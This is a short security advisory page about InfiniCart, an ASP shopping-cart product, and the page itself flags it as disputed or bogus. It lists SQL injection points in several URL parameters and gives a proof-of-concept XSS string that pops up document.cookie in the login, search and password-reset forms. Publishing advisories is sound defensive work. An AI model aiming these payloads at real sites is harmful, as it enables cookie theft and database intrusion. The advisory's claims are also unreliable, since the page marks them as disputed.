WARNING! Fake news / Disputed / BOGUS

infinicart [ multiples injection sql & xss (post) ]

2006.11.19
Credit: laurent gaffi & benjamin moss
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-5958 | CVE-2006-5957
CWE: N/A

vendor site: http://www.ecommercemax.com/ product : infinicart bug: multiples injection sql & xss language : asp risk : high injection sql (get): /infinicart-demo/browse_group.asp?groupid=[sql] /infinicart-demo/added_to_cart.asp?productid=[sql] /infinicart-demo/browsesubcat.asp?catid=[sql] /infinicart-demo/browsesubcat.asp?catid=13&subid=[sql] xss (post) : in /infinicart-demo/login.asp : username ( go for 2 xss like : </textarea>'"><script>alert(document.cookie)</script>;</textarea>'"><scr ipt>alert(document.cookie)</script> ) passwd ( same as username ) in /infinicart-demo/search.asp : post the following search = </textarea>'"><script>alert(document.cookie)</script> in /infinicart-demo/sendpassword.asp : email= </textarea>'"><script>alert(document.cookie)</script> laurent gaffi & benjamin moss http://s-a-p.ca/ contact: saps.audit (at) gmail (dot) com [email concealed]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top